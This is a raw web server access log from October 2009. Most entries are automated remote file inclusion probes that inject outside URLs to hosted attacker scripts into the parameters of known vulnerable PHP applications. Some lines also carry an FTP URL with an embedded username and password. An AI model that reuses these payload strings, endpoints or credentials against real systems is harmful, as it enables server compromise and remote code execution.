93.174.0.17 - - [16/Oct/2009:09:42:44 -0500] "GET /logs/home.php?pagina=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:09:42:45 -0500] "GET /home.php?pagina=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:09:42:45 -0500] "GET /logs/home.php?pagina=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:09:42:46 -0500] "GET /logs/access_log.1253145600/home.php?pagina=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:09:42:46 -0500] "GET /home.php?pagina=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
65.55.106.233 - - [16/Oct/2009:09:43:01 -0500] "GET /logs/access_log.1143158400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.206.120.162 - - [16/Oct/2009:09:43:04 -0500] "GET ///?commonpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:43:12 -0500] "GET /logs/access_log.1250640000///?commonpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:43:14 -0500] "GET /logs/access_log.1252281600///?commonpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:09:43:14 -0500] "GET /logs///?commonpath=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 200 209043 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:09:43:15 -0500] "GET /logs/access_log.1253059200/home.php?pagina=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:09:43:15 -0500] "GET /logs/access_log.1253059200/home.php?pagina=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.55.208.121 - - [16/Oct/2009:09:43:15 -0500] "GET /logs/access_log.1126310400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
93.174.0.17 - - [16/Oct/2009:09:43:17 -0500] "GET /logs/access_log.1253059200/home.php?pagina=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:09:43:21 -0500] "GET /logs/access_log.1253059200/home.php?pagina=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.55.207.45 - - [16/Oct/2009:09:46:01 -0500] "GET /logs/access_log.1148342400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.79.81.248 - - [16/Oct/2009:09:46:56 -0500] "GET /logs////skin/happycast_category_lightblack/login.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:09:46:56 -0500] "GET /logs/access_log.1250899200////skin/happycast_category_lightblack/login.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
77.79.81.248 - - [16/Oct/2009:09:46:57 -0500] "GET ////skin/happycast_category_lightblack/login.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:46:57 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:46:57 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:46:57 -0500] "GET /logs/access_log.1234483200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:46:58 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:03 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:03 -0500] "GET /logs/access_log.1232755200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:03 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:03 -0500] "GET /logs/access_log.1234224000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:04 -0500] "GET /logs/access_log.1230595200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:05 -0500] "GET /logs/access_log.1231891200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:05 -0500] "GET /logs/access_log.1232409600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:13 -0500] "GET /logs/access_log.1233619200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:13 -0500] "GET /logs/access_log.1234742400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:13 -0500] "GET /logs/access_log.1234569600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:13 -0500] "GET /logs/access_log.1233964800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:14 -0500] "GET /logs/access_log.1238716800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:14 -0500] "GET /logs/access_log.1238889600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:14 -0500] "GET /logs/access_log.1230249600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:14 -0500] "GET /logs/access_log.1235779200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:15 -0500] "GET /logs/access_log.1233878400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:15 -0500] "GET /logs/access_log.1238544000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:21 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:21 -0500] "GET /logs/access_log.1235088000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:21 -0500] "GET /logs/access_log.1234051200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:21 -0500] "GET /logs/access_log.1231113600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:21 -0500] "GET /logs/access_log.1230681600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:21 -0500] "GET /logs/access_log.1234828800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:22 -0500] "GET /logs/access_log.1237680000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:22 -0500] "GET /logs/access_log.1232582400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
65.55.208.121 - - [16/Oct/2009:09:47:24 -0500] "GET /logs/access_log.1177632000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
218.27.203.107 - - [16/Oct/2009:09:47:31 -0500] "GET /logs/access_log.1234396800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:35 -0500] "GET /logs/access_log.1230940800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:41 -0500] "GET /logs/access_log.1230163200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:41 -0500] "GET /logs/access_log.1249171200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:42 -0500] "GET /logs/access_log.1233532800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:43 -0500] "GET /logs/access_log.1237852800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:51 -0500] "GET /logs/access_log.1232668800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:51 -0500] "GET /logs/access_log.1245110400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:51 -0500] "GET /logs/access_log.1239840000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:53 -0500] "GET /logs/access_log.1242259200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:53 -0500] "GET /logs/access_log.1235606400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:53 -0500] "GET /logs/access_log.1235692800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:47:55 -0500] "GET /logs/access_log.1249257600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:48:02 -0500] "GET /logs/access_log.1239753600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:48:03 -0500] "GET /logs/access_log.1248912000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:48:07 -0500] "GET /logs/access_log.1230336000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:48:10 -0500] "GET /logs/access_log.1249430400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:48:27 -0500] "GET /logs/access_log.1240617600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:48:27 -0500] "GET /logs/access_log.1229817600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:48:37 -0500] "GET /logs/access_log.1238630400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.27.203.107 - - [16/Oct/2009:09:48:42 -0500] "GET /logs/access_log.1249344000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
174.133.148.98 - - [16/Oct/2009:09:49:25 -0500] "GET //?_zb_path=http://n34.biz/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
174.133.148.98 - - [16/Oct/2009:09:49:25 -0500] "GET /logs/access_log.1228608000//?_zb_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.133.148.98 - - [16/Oct/2009:09:49:26 -0500] "GET /logs//?_zb_path=http://n34.biz/id1.txt??? HTTP/1.1" 200 209042 "-""Mozilla/5.0"
65.55.106.230 - - [16/Oct/2009:09:50:31 -0500] "GET /logs/access_log.1251504000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.133.148.98 - - [16/Oct/2009:09:52:24 -0500] "GET /logs/access_log.1228608000%20%20//?_zb_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:09:53:03 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:09:53:03 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:09:53:03 -0500] "GET /logs/access_log.1241481600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:09:53:04 -0500] "GET /logs/access_log.1241568000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
65.55.106.210 - - [16/Oct/2009:09:54:01 -0500] "GET /logs/access_log.1149724800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.11.145.8 - - [16/Oct/2009:09:54:06 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:09:54:06 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:09:54:06 -0500] "GET /logs/access_log.1241481600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:09:54:06 -0500] "GET /logs/access_log.1241568000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
65.55.107.181 - - [16/Oct/2009:09:54:31 -0500] "GET /logs/access_log.1145059200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
168.143.19.89 - - [16/Oct/2009:09:55:30 -0500] "GET /logs/index.php?redir=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 297 "-""libwww-perl/5.825"
168.143.19.89 - - [16/Oct/2009:09:55:30 -0500] "GET /index.php?redir=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 292 "-""libwww-perl/5.825"
174.133.148.98 - - [16/Oct/2009:09:56:16 -0500] "GET /include/print_category.php?setup[use_category]=1&dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
174.133.148.98 - - [16/Oct/2009:09:56:16 -0500] "GET /logs/include/print_category.php?setup[use_category]=1&dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
174.133.148.98 - - [16/Oct/2009:09:56:16 -0500] "GET /logs/access_log.1238371200/include/print_category.php?setup[use_category]=1&dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
174.133.148.98 - - [16/Oct/2009:09:56:16 -0500] "GET /logs/access_log.1249776000/include/print_category.php?setup[use_category]=1&dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
174.133.148.98 - - [16/Oct/2009:09:57:27 -0500] "GET /include/print_category.php?setup[use_category]=1&dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
174.133.148.98 - - [16/Oct/2009:09:57:27 -0500] "GET /logs/include/print_category.php?setup[use_category]=1&dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
174.133.148.98 - - [16/Oct/2009:09:57:27 -0500] "GET /logs/access_log.1244764800/include/print_category.php?setup[use_category]=1&dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
174.133.148.98 - - [16/Oct/2009:09:57:27 -0500] "GET /logs/access_log.1238371200/include/print_category.php?setup[use_category]=1&dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
59.125.5.1 - - [16/Oct/2009:09:57:27 -0500] "GET //skin/happycast_category_lightblack/login.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
59.125.5.1 - - [16/Oct/2009:09:57:28 -0500] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
59.125.5.1 - - [16/Oct/2009:09:57:28 -0500] "GET /logs/access_log.1251417600//skin/happycast_category_lightblack/login.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:09:57:36 -0500] "GET /logs/access_log.1241049600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:09:57:36 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:09:57:36 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:10:00:57 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:10:00:57 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:10:00:57 -0500] "GET /logs/access_log.1237075200///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:10:00:58 -0500] "GET /logs/access_log.1236729600///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
206.108.7.161 - - [16/Oct/2009:10:00:59 -0500] "GET /logs/index.php?redir=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
206.108.7.161 - - [16/Oct/2009:10:00:59 -0500] "GET /index.php?redir=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
211.206.120.162 - - [16/Oct/2009:10:01:10 -0500] "GET /logs/access_log.1228176000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ihent.ru//id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:10:01:10 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ihent.ru//id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:10:01:10 -0500] "GET /logs/access_log.1229126400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ihent.ru//id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:10:01:10 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ihent.ru//id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:10:01:28 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:10:01:28 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.11.145.8 - - [16/Oct/2009:10:01:28 -0500] "GET /logs/access_log.1241049600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
